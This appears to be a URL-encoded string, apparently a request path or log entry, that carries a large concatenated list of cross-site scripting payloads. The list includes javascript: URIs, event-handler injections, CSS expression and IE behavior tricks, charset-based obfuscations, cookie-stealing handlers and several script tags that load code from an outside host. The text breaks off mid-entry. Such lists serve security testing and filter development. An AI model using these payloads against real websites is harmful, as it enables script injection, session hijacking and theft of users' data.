%22-test--a---a-href=%22%5CxE2%5Cx81%5Cx9Fjavascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx1Cjavascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javascript%5Cx00:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javascript%5Cx3A:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javascript%5Cx09:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javascript%5Cx0D:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javascript%5Cx0A:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a--%60%22'--img-src=xxx:x-%5Cx0Aonerror=javascript:alert(1)--%60%22'--img-src=xxx:x-%5Cx22onerror=javascript:alert(1)--%60%22'--img-src=xxx:x-%5Cx0Bonerror=javascript:alert(1)--%60%22'--img-src=xxx:x-%5Cx0Donerror=javascript:alert(1)--%60%22'--img-src=xxx:x-%5Cx2Fonerror=javascript:alert(1)--%60%22'--img-src=xxx:x-%5Cx09onerror=javascript:alert(1)--%60%22'--img-src=xxx:x-%5Cx0Conerror=javascript:alert(1)--%60%22'--img-src=xxx:x-%5Cx00onerror=javascript:alert(1)--%60%22'--img-src=xxx:x-%5Cx27onerror=javascript:alert(1)--%60%22'--img-src=xxx:x-%5Cx20onerror=javascript:alert(1)--%22%60'--script-%5Cx3Bjavascript:alert(1)--script--%22%60'--script-%5Cx0Djavascript:alert(1)--script--%22%60'--script-%5CxEF%5CxBB%5CxBFjavascript:alert(1)--script--%22%60'--script-%5CxE2%5Cx80%5Cx81javascript:alert(1)--script--%22%60'--script-%5CxE2%5Cx80%5Cx84javascript:alert(1)--script--%22%60'--script-%5CxE3%5Cx80%5Cx80javascript:alert(1)--script--%22%60'--script-%5Cx09javascript:alert(1)--script--%22%60'--script-%5CxE2%5Cx80%5Cx89javascript:alert(1)--script--%22%60'--script-%5CxE2%5Cx80%5Cx85javascript:alert(1)--script--%22%60'--script-%5CxE2%5Cx80%5Cx88javascript:alert(1)--script--%22%60'--script-%5Cx00javascript:alert(1)--script--%22%60'--script-%5CxE2%5Cx80%5CxA8javascript:alert(1)--script--%22%60'--script-%5CxE2%5Cx80%5Cx8Ajavascript:alert(1)--script--%22%60'--script-%5CxE1%5Cx9A%5Cx80javascript:alert(1)--script--%22%60'--script-%5Cx0Cjavascript:alert(1)--script--%22%60'--script-%5Cx2Bjavascript:alert(1)--script--%22%60'--script-%5CxF0%5Cx90%5Cx96%5Cx9Ajavascript:alert(1)--script--%22%60'--script--javascript:alert(1)--script--%22%60'--script-%5Cx0Ajavascript:alert(1)--script--%22%60'--script-%5CxE2%5Cx80%5CxAFjavascript:alert(1)--script--%22%60'--script-%5Cx7Ejavascript:alert(1)--script--%22%60'--script-%5CxE2%5Cx80%5Cx87javascript:alert(1)--script--%22%60'--script-%5CxE2%5Cx81%5Cx9Fjavascript:alert(1)--script--%22%60'--script-%5CxE2%5Cx80%5CxA9javascript:alert(1)--script--%22%60'--script-%5CxC2%5Cx85javascript:alert(1)--script--%22%60'--script-%5CxEF%5CxBF%5CxAEjavascript:alert(1)--script--%22%60'--script-%5CxE2%5Cx80%5Cx83javascript:alert(1)--script--%22%60'--script-%5CxE2%5Cx80%5Cx8Bjavascript:alert(1)--script--%22%60'--script-%5CxEF%5CxBF%5CxBEjavascript:alert(1)--script--%22%60'--script-%5CxE2%5Cx80%5Cx80javascript:alert(1)--script--%22%60'--script-%5Cx21javascript:alert(1)--script--%22%60'--script-%5CxE2%5Cx80%5Cx82javascript:alert(1)--script--%22%60'--script-%5CxE2%5Cx80%5Cx86javascript:alert(1)--script--%22%60'--script-%5CxE1%5CxA0%5Cx8Ejavascript:alert(1)--script--%22%60'--script-%5Cx0Bjavascript:alert(1)--script--%22%60'--script-%5Cx20javascript:alert(1)--script--%22%60'--script-%5CxC2%5CxA0javascript:alert(1)--script--%22---img-onerror=%5Cx0Bjavascript:alert(1)%5Cx0Bsrc=xxx:x----%22---img-onerror=%5Cx22javascript:alert(1)%5Cx22src=xxx:x----%22---img-onerror=%5Cx09javascript:alert(1)%5Cx09src=xxx:x----%22---img-onerror=%5Cx27javascript:alert(1)%5Cx27src=xxx:x----%22---img-onerror=%5Cx0Ajavascript:alert(1)%5Cx0Asrc=xxx:x----%22---img-onerror=%5Cx0Cjavascript:alert(1)%5Cx0Csrc=xxx:x----%22---img-onerror=%5Cx0Djavascript:alert(1)%5Cx0Dsrc=xxx:x----%22---img-onerror=%5Cx60javascript:alert(1)%5Cx60src=xxx:x----%22---img-onerror=%5Cx20javascript:alert(1)%5Cx20src=xxx:x-----script%5Cx2F-javascript:alert(1)--script---script%5Cx20-javascript:alert(1)--script---script%5Cx0D-javascript:alert(1)--script---script%5Cx0A-javascript:alert(1)--script---script%5Cx0C-javascript:alert(1)--script---script%5Cx00-javascript:alert(1)--script---script%5Cx09-javascript:alert(1)--script--%60%22'--img-src=xxx:x-onerror%5Cx0B=javascript:alert(1)--%60%22'--img-src=xxx:x-onerror%5Cx00=javascript:alert(1)--%60%22'--img-src=xxx:x-onerror%5Cx0C=javascript:alert(1)--%60%22'--img-src=xxx:x-onerror%5Cx0D=javascript:alert(1)--%60%22'--img-src=xxx:x-onerror%5Cx20=javascript:alert(1)--%60%22'--img-src=xxx:x-onerror%5Cx0A=javascript:alert(1)--%60%22'--img-src=xxx:x-onerror%5Cx09=javascript:alert(1)---script-javascript:alert(1)-%5Cx00-script---img-src=%23-onerror%5Cx3D%22javascript:alert(1)%22----input-onfocus=javascript:alert(1)-autofocus---input-onblur=javascript:alert(1)-autofocus--input-autofocus---video-poster=javascript:javascript:alert(1)----body-onscroll=javascript:alert(1)--br--br--br--br--br--br-...-br--br--br--br--br--br--br--br--br--br-...-br--br--br--br--br--br--br--br--br--br-...-br--br--br--br--br--br--br--br--br--br-...-br--br--br--br--br--br--br--br--br--br-...-br--br--br--br--input-autofocus---form-id=test-onforminput=javascript:alert(1)--input---form--button-form=test-onformchange=javascript:alert(1)-X--video--source-onerror=%22javascript:javascript:alert(1)%22---video-onerror=%22javascript:javascript:alert(1)%22--source---form--button-formaction=%22javascript:javascript:alert(1)%22-X--body-oninput=javascript:alert(1)--input-autofocus---math-href=%22javascript:javascript:alert(1)%22-CLICKME--math----math---maction-actiontype=%22statusline%23http:--google.com%22-xlink:href=%22javascript:javascript:alert(1)%22-CLICKME--maction----math---frameset-onload=javascript:alert(1)---table-background=%22javascript:javascript:alert(1)%22---!---img-src=%22----img-src=x-onerror=javascript:alert(1)--%22---comment--img-src=%22--comment--img-src=x-onerror=javascript:alert(1))--%22---!%5B--img-src=%22%5D--img-src=x-onerror=javascript:alert(1)--%22---style--img-src=%22--style--img-src=x-onerror=javascript:alert(1)--%22---li-style=list-style:url()-onerror=javascript:alert(1)---div-style=content:url(data:image-svg-xml,%25%253Csvg-%25%253E);visibility:hidden-onload=javascript:alert(1)---div---head--base-href=%22javascript:--%22---head--body--a-href=%22-.--,javascript:alert(1)--%23%22-XXX--a---body---SCRIPT-FOR=document-EVENT=onreadystatechange-javascript:alert(1)--SCRIPT---OBJECT-CLASSID=%22clsid:333C7BC4-460F-11D0-BC04-0080C7055A83%22--PARAM-NAME=%22DataURL%22-VALUE=%22javascript:alert(1)%22---OBJECT---object-data=%22data:text-html;base64,%25(base64)s%22---embed-src=%22data:text-html;base64,%25(base64)s%22---b--script-alert(1)--script-0--div-id=%22div1%22--input-value=%22%60%60onmouseover=javascript:alert(1)%22---div---div-id=%22div2%22---div--script-document.getElementById(%22div2%22).innerHTML-=-document.getElementById(%22div1%22).innerHTML;--script---x-'=%22foo%22--x-foo='--img-src=x-onerror=javascript:alert(1)--'---embed-src=%22javascript:alert(1)%22---img-src=%22javascript:alert(1)%22---image-src=%22javascript:alert(1)%22---script-src=%22javascript:alert(1)%22---div-style=width:1px;filter:glow-onfilterchange=javascript:alert(1)-x--%3F-foo=%22--script-javascript:alert(1)--script-%22---!-foo=%22--script-javascript:alert(1)--script-%22-----foo=%22--script-javascript:alert(1)--script-%22---%3F-foo=%22--x-foo='%3F--script-javascript:alert(1)--script-'-%22---!-foo=%22%5B%5B%5BInception%5D%5D%22--x-foo=%22%5Dfoo--script-javascript:alert(1)--script-%22---%25-foo--x-foo=%22%25--script-javascript:alert(1)--script-%22---div-id=d--x-xmlns=%22--iframe-onload=javascript:alert(1)%22---div---script-d.innerHTML=d.innerHTML--script---img-%5Cx00src=x-onerror=%22alert(1)%22---img-%5Cx47src=x-onerror=%22javascript:alert(1)%22---img-%5Cx11src=x-onerror=%22javascript:alert(1)%22---img-%5Cx12src=x-onerror=%22javascript:alert(1)%22---img%5Cx47src=x-onerror=%22javascript:alert(1)%22---img%5Cx10src=x-onerror=%22javascript:alert(1)%22---img%5Cx13src=x-onerror=%22javascript:alert(1)%22---img%5Cx32src=x-onerror=%22javascript:alert(1)%22---img%5Cx47src=x-onerror=%22javascript:alert(1)%22---img%5Cx11src=x-onerror=%22javascript:alert(1)%22---img-%5Cx47src=x-onerror=%22javascript:alert(1)%22---img-%5Cx34src=x-onerror=%22javascript:alert(1)%22---img-%5Cx39src=x-onerror=%22javascript:alert(1)%22---img-%5Cx00src=x-onerror=%22javascript:alert(1)%22---img-src%5Cx09=x-onerror=%22javascript:alert(1)%22---img-src%5Cx10=x-onerror=%22javascript:alert(1)%22---img-src%5Cx13=x-onerror=%22javascript:alert(1)%22---img-src%5Cx32=x-onerror=%22javascript:alert(1)%22---img-src%5Cx12=x-onerror=%22javascript:alert(1)%22---img-src%5Cx11=x-onerror=%22javascript:alert(1)%22---img-src%5Cx00=x-onerror=%22javascript:alert(1)%22---img-src%5Cx47=x-onerror=%22javascript:alert(1)%22---img-src=x%5Cx09onerror=%22javascript:alert(1)%22---img-src=x%5Cx10onerror=%22javascript:alert(1)%22---img-src=x%5Cx11onerror=%22javascript:alert(1)%22---img-src=x%5Cx12onerror=%22javascript:alert(1)%22---img-src=x%5Cx13onerror=%22javascript:alert(1)%22---img%5Ba%5D%5Bb%5D%5Bc%5Dsrc%5Bd%5D=x%5Be%5Donerror=%5Bf%5D%22alert(1)%22---img-src=x-onerror=%5Cx09%22javascript:alert(1)%22---img-src=x-onerror=%5Cx10%22javascript:alert(1)%22---img-src=x-onerror=%5Cx11%22javascript:alert(1)%22---img-src=x-onerror=%5Cx12%22javascript:alert(1)%22---img-src=x-onerror=%5Cx32%22javascript:alert(1)%22---img-src=x-onerror=%5Cx00%22javascript:alert(1)%22---a-href=java&%231&%232&%233&%234&%235&%236&%237&%238&%2311&%2312script:javascript:alert(1)-XXX--a---img-src=%22x%60-%60-script-javascript:alert(1)--script-%22%60-%60---img-src-onerror--%22-'%22=-alt=javascript:alert(1)--%22---title-onpropertychange=javascript:alert(1)---title--title-title=---a-href=http:--foo.bar-%23x=%60y---a--img-alt=%22%60--img-src=x:x-onerror=javascript:alert(1)---a-%22---!--%5Bif%5D--script-javascript:alert(1)--script------!--%5Bif-img-src=x-onerror=javascript:alert(1)--%5D-------script-src=%22-%5C%25(jscript)s%22---script---script-src=%22%5C%5C%25(jscript)s%22---script---object-id=%22x%22-classid=%22clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598%22---object---object-classid=%22clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B%22-onqt_error=%22javascript:alert(1)%22-style=%22behavior:url(%23x);%22--param-name=postdomevents-----object---a-style=%22-o-link:'javascript:javascript:alert(1)';-o-link-source:current%22-X--style-p%5Bfoo=bar%7B%7D%7B-o-link:'javascript:javascript:alert(1)'%7D%7B%7D*%7B-o-link-source:current%7D%5D%7Bcolor:red%7D;--style---link-rel=stylesheet-href=data:,%257bx:expression(javascript:alert(1))%257d--style-@import-%22data:,%257bx:expression(javascript:alert(1))%257D%22;--style---a-style=%22pointer-events:none;position:absolute;%22--a-style=%22position:absolute;%22-onclick=%22javascript:alert(1);%22-XXX--a---a--a-href=%22javascript:javascript:alert(1)%22-XXX--a---style-%5B%7B%7D@import'%25(css)s%3F%5D--style-X--div-style=%22font-family:'foo&%2310;;color:red;';%22-XXX--div-style=%22font-family:foo%7Dcolor=red;%22-XXX-----style=x:expression%5C28javascript:alert(1)%5C29---style-%7Bx:%EF%BD%85%EF%BD%98%EF%BD%90%EF%BD%92%EF%BD%85%EF%BD%93%EF%BD%93%EF%BD%89%EF%BD%8F%EF%BD%8E(javascript:alert(1))%7D--style---div-style=content:url(%25(svg)s)---div---div-style=%22list-style:url(http:--foo.f)%5C20url(javascript:javascript:alert(1));%22-X--div-id=d--div-style=%22font-family:'sans%5C27%5C3B-color%5C3Ared%5C3B'%22-X--div---div---script-with(document.getElementById(%22d%22))innerHTML=innerHTML--script---div-style=%22background:url(-f%23&%23127;oo-;color:red--foo.jpg);%22-X--div-style=%22font-family:foo%7Bbar;background:url(http:--foo.f-oo%7D;color:red--foo.jpg);%22-X--div-id=%22x%22-XXX--div---style---%23x%7Bfont-family:foo%5Bbar;color:green;%7D--%23y%5D;color:red;%7B%7D----style---x-style=%22background:url('x&%231;;color:red;-')%22-XXX--x---script-(%7Bset--$($)%7B_--setter=$,=javascript:alert(1)%7D%7D).$=eval--script---script-(%7B0:%230=eval-%230%23-%230%23(javascript:alert(1))%7D)--script---script-ReferenceError.prototype.defineGetter('name',-function()%7Bjavascript:alert(1)%7D),x--script---script-Object.noSuchMethod-=-Function,%5B%7B%7D%5D%5B0%5D.constructor.('javascript:alert(1)')()--script---meta-charset=%22x-imap4-modified-utf7%22-&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi--meta-charset=%22x-imap4-modified-utf7%22-&-script&S1&TS&1-alert&A7&(1)&R&UA;&&-&A9&11-script&X&---meta-charset=%22mac-farsi%22-%C2%BCscript%C2%BEjavascript:alert(1)%C2%BC-script%C2%BE-X-x-style=%60behavior:url(%23default%23time2)%60-onbegin=%60javascript:alert(1)%60---1-set-xmlns=%60urn:schemas-microsoft-com:time%60-style=%60beh&%23x41vior:url(%23default%23time2)%60-attributename=%60innerhtml%60-to=%60<img-src="x"onerror=javascript:alert(1)>%60--1-animate-xmlns=urn:schemas-microsoft-com:time-style=behavior:url(%23default%23time2)-attributename=innerhtml-values=<img-src="."onerror=javascript:alert(1)>---vmlframe-xmlns=urn:schemas-microsoft-com:vml-style=behavior:url(%23default%23vml);position:absolute;width:100%25;height:100%25-src=%25(vml)s%23xss---vmlframe--1-a-href=%23--line-xmlns=urn:schemas-microsoft-com:vml-style=behavior:url(%23default%23vml);position:absolute-href=javascript:javascript:alert(1)-strokecolor=white-strokeweight=1000px-from=0-to=1000-----a---a-style=%22behavior:url(%23default%23AnchorClick);%22-folder=%22javascript:javascript:alert(1)%22-XXX--a---x-style=%22behavior:url(%25(sct)s)%22---xml-id=%22xss%22-src=%22%25(htc)s%22---xml---label-dataformatas=%22html%22-datasrc=%22%23xss%22-datafld=%22payload%22---label---event-source-src=%22%25(event)s%22-onload=%22javascript:alert(1)%22---a-href=%22javascript:javascript:alert(1)%22--event-source-src=%22data:application-x-dom-event-stream,Event:click%250Adata:XXX%250A%250A%22---div-id=%22x%22-x--div---xml:namespace-prefix=%22t%22---import-namespace=%22t%22-implementation=%22%23default%23time2%22---t:set-attributeName=%22innerHTML%22-targetElement=%22x%22-to=%22<img&%2311;src=x:x&%2311;onerror&%2311;=javascript:alert(1)>%22---script-%25(payload)s--script---script-src=%25(jscript)s---script---script-language='javascript'-src='%25(jscript)s'---script---script-javascript:alert(1)--script---IMG-SRC=%22javascript:javascript:alert(1);%22---IMG-SRC=javascript:javascript:alert(1)---IMG-SRC=%60javascript:javascript:alert(1)%60---SCRIPT-SRC=%25(jscript)s%3F-B---FRAMESET--FRAME-SRC=%22javascript:javascript:alert(1);%22---FRAMESET---BODY-ONLOAD=javascript:alert(1)---BODY-ONLOAD=javascript:javascript:alert(1)---IMG-SRC=%22jav----ascript:javascript:alert(1);%22---BODY-onload!%23$%25%25&()--_.,:;%3F@%5B-%7C%5C%5D%5E%60=javascript:alert(1)---SCRIPT-SRC=%22%25(jscript)s%22---SCRIPT----SCRIPT-%25(payload)s-----SCRIPT---IMG-SRC=%22javascript:javascript:alert(1)%22--iframe-src=%25(scriptlet)s----INPUT-TYPE=%22IMAGE%22-SRC=%22javascript:javascript:alert(1);%22---IMG-DYNSRC=%22javascript:javascript:alert(1)%22---IMG-LOWSRC=%22javascript:javascript:alert(1)%22---BGSOUND-SRC=%22javascript:javascript:alert(1);%22---BR-SIZE=%22&%7Bjavascript:alert(1)%7D%22---LAYER-SRC=%22%25(scriptlet)s%22---LAYER---LINK-REL=%22stylesheet%22-HREF=%22javascript:javascript:alert(1);%22---STYLE-@import'%25(css)s';--STYLE---META-HTTP-EQUIV=%22Link%22-Content=%22-%25(css)s-;-REL=stylesheet%22---XSS-STYLE=%22behavior:-url(%25(htc)s);%22---STYLE-li-%7Blist-style-image:-url(%22javascript:javascript:alert(1)%22);%7D--STYLE--UL--LI-XSS--META-HTTP-EQUIV=%22refresh%22-CONTENT=%220;url=javascript:javascript:alert(1);%22---META-HTTP-EQUIV=%22refresh%22-CONTENT=%220;-URL=http:--;URL=javascript:javascript:alert(1);%22---IFRAME-SRC=%22javascript:javascript:alert(1);%22---IFRAME---TABLE-BACKGROUND=%22javascript:javascript:alert(1)%22---TABLE--TD-BACKGROUND=%22javascript:javascript:alert(1)%22---DIV-STYLE=%22background-image:-url(javascript:javascript:alert(1))%22---DIV-STYLE=%22width:expression(javascript:alert(1));%22---IMG-STYLE=%22xss:expr-XSS-ession(javascript:alert(1))%22---XSS-STYLE=%22xss:expression(javascript:alert(1))%22---STYLE-TYPE=%22text-javascript%22-javascript:alert(1);--STYLE---STYLE-.XSS%7Bbackground-image:url(%22javascript:javascript:alert(1)%22);%7D--STYLE--A-CLASS=XSS---A---STYLE-type=%22text-css%22-BODY%7Bbackground:url(%22javascript:javascript:alert(1)%22)%7D--STYLE---!--%5Bif-gte-IE-4%5D--SCRIPT-javascript:alert(1);--SCRIPT--!%5Bendif%5D-----BASE-HREF=%22javascript:javascript:alert(1);--%22---OBJECT-TYPE=%22text-x-scriptlet%22-DATA=%22%25(scriptlet)s%22---OBJECT---OBJECT-classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389--param-name=url-value=javascript:javascript:alert(1)---OBJECT---HTML-xmlns:xss--%3Fimport-namespace=%22xss%22-implementation=%22%25(htc)s%22--xss:xss-XSS--xss:xss---HTML-%22%22%22,%22XML-namespace.%22),(%22%22%22-XML-ID=%22xss%22--I--B-<IMG-SRC=%22javas-!------cript:javascript:alert(1)%22>--B---I---XML--SPAN-DATASRC=%22%23xss%22-DATAFLD=%22B%22-DATAFORMATAS=%22HTML%22---SPAN---HTML--BODY--%3Fxml:namespace-prefix=%22t%22-ns=%22urn:schemas-microsoft-com:time%22--%3Fimport-namespace=%22t%22-implementation=%22%23default%23time2%22--t:set-attributeName=%22innerHTML%22-to=%22XSS<SCRIPT-DEFER>javascript:alert(1)<-SCRIPT>%22---BODY---HTML---SCRIPT-SRC=%22%25(jpg)s%22---SCRIPT---HEAD--META-HTTP-EQUIV=%22CONTENT-TYPE%22-CONTENT=%22text-html;-charset=UTF-7%22----HEAD--ADw-SCRIPT-AD4-%25(payload)s;-ADw--SCRIPT-AD4---form-id=%22test%22----button-form=%22test%22-formaction=%22javascript:javascript:alert(1)%22-X--body-onscroll=javascript:alert(1)--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--br--input-autofocus---P-STYLE=%22behavior:url('%23default%23time2')%22-end=%220%22-onEnd=%22javascript:alert(1)%22---STYLE-@import'%25(css)s';--STYLE---STYLE-a%7Bbackground:url('s1'-'s2)%7D@import-javascript:javascript:alert(1);');%7D--STYLE---meta-charset=-%22x-imap4-modified-utf7%22&&-&&-script&&-javascript:alert(1)&&;&&-&&-script&&---SCRIPT-onreadystatechange=javascript:javascript:alert(1);---SCRIPT---style-onreadystatechange=javascript:javascript:alert(1);---style---%3Fxml-version=%221.0%22%3F--html:html-xmlns:html='http:--www.w3.org-1999-xhtml'--html:script-javascript:alert(1);--html:script---html:html---embed-code=%25(scriptlet)s---embed---embed-code=javascript:javascript:alert(1);---embed---embed-src=%25(jscript)s---embed---frameset-onload=javascript:javascript:alert(1)---frameset---object-onerror=javascript:javascript:alert(1)---embed-type=%22image%22-src=%25(scriptlet)s---embed---XML-ID=I--X--C--!%5BCDATA%5B-IMG-SRC=%22javas%5D%5D-!%5BCDATA%5Bcript:javascript:alert(1);%22-%5D%5D--C--X---xml---IMG-SRC=&%7Bjavascript:alert(1);%7D;---a-href=%22jav&%2365ascript:javascript:alert(1)%22-test1--a---a-href=%22jav&%2397ascript:javascript:alert(1)%22-test1--a---embed-width=500-height=500-code=%22data:text-html,-script-%25(payload)s--script-%22---embed---iframe-srcdoc=%22<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(1)&gt;-%22--';alert(String.fromCharCode(88,83,83))--';alert(String.fromCharCode(88,83,83))--%22;-alert(String.fromCharCode(88,83,83))--%22;alert(String.fromCharCode(88,83,83))--------SCRIPT-%22-'--SCRIPT-alert(String.fromCharCode(88,83,83))--SCRIPT--'';!--%22-XSS-=&%7B()%7D--SCRIPT-SRC=http:--ha.ckers.org-xss.js---SCRIPT---IMG-SRC=%22javascript:alert('XSS');%22---IMG-SRC=javascript:alert('XSS')---IMG-SRC=JaVaScRiPt:alert('XSS')---IMG-SRC=javascript:alert(%22XSS%22)---IMG-SRC=%60javascript:alert(%22RSnake-says,-'XSS'%22)%60---a-onmouseover=%22alert(document.cookie)%22-xxs-link--a---a-onmouseover=alert(document.cookie)-xxs-link--a---IMG-%22%22%22--SCRIPT-alert(%22XSS%22)--SCRIPT-%22---IMG-SRC=javascript:alert(String.fromCharCode(88,83,83))---IMG-SRC=%23-onmouseover=%22alert('xxs')%22---IMG-SRC=-onmouseover=%22alert('xxs')%22---IMG-onmouseover=%22alert('xxs')%22---IMG-SRC=&%23106;&%2397;&%23118;&%2397;&%23115;&%2399;&%23114;&%23105;&%23112;&%23116;&%2358;&%2397;&%23108;&%23101;&%23114;&%23116;&%2340;&%2339;&%2388;&%2383;&%2383;&%2339;&%2341;---IMG-SRC=&%230000106&%230000097&%230000118&%230000097&%230000115&%230000099&%230000114&%230000105&%230000112&%230000116&%230000058&%230000097&%230000108&%230000101&%230000114&%230000116&%230000040&%230000039&%230000088&%230000083&%230000083&%230000039&%230000041---IMG-SRC=&%23x6A&%23x61&%23x76&%23x61&%23x73&%23x63&%23x72&%23x69&%23x70&%23x74&%23x3A&%23x61&%23x6C&%23x65&%23x72&%23x74&%23x28&%23x27&%23x58&%23x53&%23x53&%23x27&%23x29---IMG-SRC=%22jav-ascript:alert('XSS');%22---IMG-SRC=%22jav&%23x09;ascript:alert('XSS');%22---IMG-SRC=%22jav&%23x0A;ascript:alert('XSS');%22---IMG-SRC=%22jav&%23x0D;ascript:alert('XSS');%22--perl--e-'print-%22-IMG-SRC=java%5C0script:alert(%5C%22XSS%5C%22)-%22;'---out--IMG-SRC=%22-&%2314;--javascript:alert('XSS');%22---SCRIPT-XSS-SRC=%22http:--ha.ckers.org-xss.js%22---SCRIPT---BODY-onload!%23$%25&()*--.,:;%3F@%5B-%7C%5C%5D%5E%60=alert(%22XSS%22)---SCRIPT-SRC=%22http:--ha.ckers.org-xss.js%22---SCRIPT----SCRIPT-alert(%22XSS%22);-----SCRIPT---SCRIPT-SRC=http:--ha.ckers.org-xss.js%3F--B----SCRIPT-SRC=--ha.ckers.org-.j---IMG-SRC=%22javascript:alert('XSS')%22--iframe-src=http:--ha.ckers.org-scriptlet.html---%5C%22;alert('XSS');-----TITLE--SCRIPT-alert(%22XSS%22);--SCRIPT---INPUT-TYPE=%22IMAGE%22-SRC=%22javascript:alert('XSS');%22---BODY-BACKGROUND=%22javascript:alert('XSS')%22---IMG-DYNSRC=%22javascript:alert('XSS')%22---IMG-LOWSRC=%22javascript:alert('XSS')%22---STYLE-li-%7Blist-style-image:-url(%22javascript:alert('XSS')%22);%7D--STYLE--UL--LI-XSS--br---IMG-SRC='vbscript:msgbox(%22XSS%22)'---IMG-SRC=%22livescript:%5Bcode%5D%22---BODY-ONLOAD=alert('XSS')---BGSOUND-SRC=%22javascript:alert('XSS');%22---BR-SIZE=%22&%7Balert('XSS')%7D%22---LINK-REL=%22stylesheet%22-HREF=%22javascript:alert('XSS');%22---LINK-REL=%22stylesheet%22-HREF=%22http:--ha.ckers.org-xss.css%22---STYLE-@import'http:--ha.ckers.org-xss.css';--STYLE---META-HTTP-EQUIV=%22Link%22-Content=%22-http:--ha.ckers.org-xss.css-;-REL=stylesheet%22---STYLE-BODY%7B-moz-binding:url(%22http:--ha.ckers.org-xssmoz.xml%23xss%22)%7D--STYLE---STYLE-@im%5Cport'%5Cja%5Cvasc%5Cript:alert(%22XSS%22)';--STYLE---IMG-STYLE=%22xss:expr-XSS-ession(alert('XSS'))%22--exp--A-STYLE='no%5Cxss:noxss(%22--%22);xss:ex-XSS----pression(alert(%22XSS%22))'---STYLE-TYPE=%22text-javascript%22-alert('XSS');--STYLE---STYLE-.XSS%7Bbackground-image:url(%22javascript:alert('XSS')%22);%7D--STYLE--A-CLASS=XSS---A---STYLE-type=%22text-css%22-BODY%7Bbackground:url(%22javascript:alert('XSS')%22)%7D--STYLE---STYLE-type=%22text-css%22-BODY%7Bbackground:url(%22javascript:alert('XSS')%22)%7D--STYLE---XSS-STYLE=%22xss:expression(alert('XSS'))%22---XSS-STYLE=%22behavior:-url(xss.htc);%22--%C2%BCscript%C2%BEalert(%C2%A2XSS%C2%A2)%C2%BC-script%C2%BE--META-HTTP-EQUIV=%22refresh%22-CONTENT=%220;url=javascript:alert('XSS');%22---META-HTTP-EQUIV=%22refresh%22-CONTENT=%220;url=data:text-html-base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%22---META-HTTP-EQUIV=%22refresh%22-CONTENT=%220;-URL=http:--;URL=javascript:alert('XSS');%22---IFRAME-SRC=%22javascript:alert('XSS');%22---IFRAME---IFRAME-SRC=%23-onmouseover=%22alert(document.cookie)%22---IFRAME---FRAMESET--FRAME-SRC=%22javascript:alert('XSS');%22---FRAMESET---TABLE-BACKGROUND=%22javascript:alert('XSS')%22---TABLE--TD-BACKGROUND=%22javascript:alert('XSS')%22---DIV-STYLE=%22background-image:-url(javascript:alert('XSS'))%22---DIV-STYLE=%22background-image:%5C0075%5C0072%5C006C%5C0028'%5C006a%5C0061%5C0076%5C0061%5C0073%5C0063%5C0072%5C0069%5C0070%5C0074%5C003a%5C0061%5C006c%5C0065%5C0072%5C0074%5C0028.1027%5C0058.1053%5C0053%5C0027%5C0029'%5C0029%22---DIV-STYLE=%22background-image:-url(&%231;javascript:alert('XSS'))%22---DIV-STYLE=%22width:-expression(alert('XSS'));%22---BASE-HREF=%22javascript:alert('XSS');--%22----OBJECT-TYPE=%22text-x-scriptlet%22-DATA=%22http:--ha.ckers.org-scriptlet.html%22---OBJECT---EMBED-SRC=%22data:image-svg-xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH-A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv-MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs-aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw-IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI-YWxlcnQoIlh-TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==%22-type=%22image-svg-xml%22-AllowScriptAccess=%22always%22---EMBED---SCRIPT-SRC=%22http:--ha.ckers.org-xss.jpg%22---SCRIPT---!--%23exec-cmd=%22-bin-echo-'-SCR'%22----!--%23exec-cmd=%22-bin-echo-'IPT-SRC=http:--ha.ckers.org-xss.js---SCRIPT-'%22-----%3F-echo('-SCR)';echo('IPT-alert(%22XSS%22)--SCRIPT-');-%3F---IMG-SRC=%22http:--www.thesiteyouareon.com-somecommand.php%3Fsomevariables=maliciouscode%22--Redirect-302--a.jpg-http:--victimsite.com-admin.asp&deleteuser--META-HTTP-EQUIV=%22Set-Cookie%22-Content=%22USERID=-SCRIPT-alert('XSS')--SCRIPT-%22----HEAD--META-HTTP-EQUIV=%22CONTENT-TYPE%22-CONTENT=%22text-html;-charset=UTF-7%22----HEAD--ADw-SCRIPT-AD4-alert('XSS');-ADw--SCRIPT-AD4---SCRIPT-a=%22-%22-SRC=%22http:--ha.ckers.org-xss.js%22---SCRIPT---SCRIPT-=%22-%22-SRC=%22http:--ha.ckers.org-xss.js%22---SCRIPT---SCRIPT-a=%22-%22-''-SRC=%22http:--ha.ckers.org-xss.js%22---SCRIPT---SCRIPT-%22a='-'%22-SRC=%22http:--ha.ckers.org-xss.js%22---SCRIPT---SCRIPT-a=%60-%60-SRC=%22http:--ha.ckers.org-xss.js%22---SCRIPT---SCRIPT-a=%22-'-%22-SRC=%22http:--ha.ckers.org-xss.js%22---SCRIPT---SCRIPT-document.write(%22-SCRI%22);--SCRIPT-PT-SRC=%22http:--ha.ckers.org-xss.js%22---SCRIPT---A-HREF=%22http:--66.102.7.147-%22-XSS--A---A-HREF=%22http:--%2577%2577%2577%252E%2567%256F%256F%25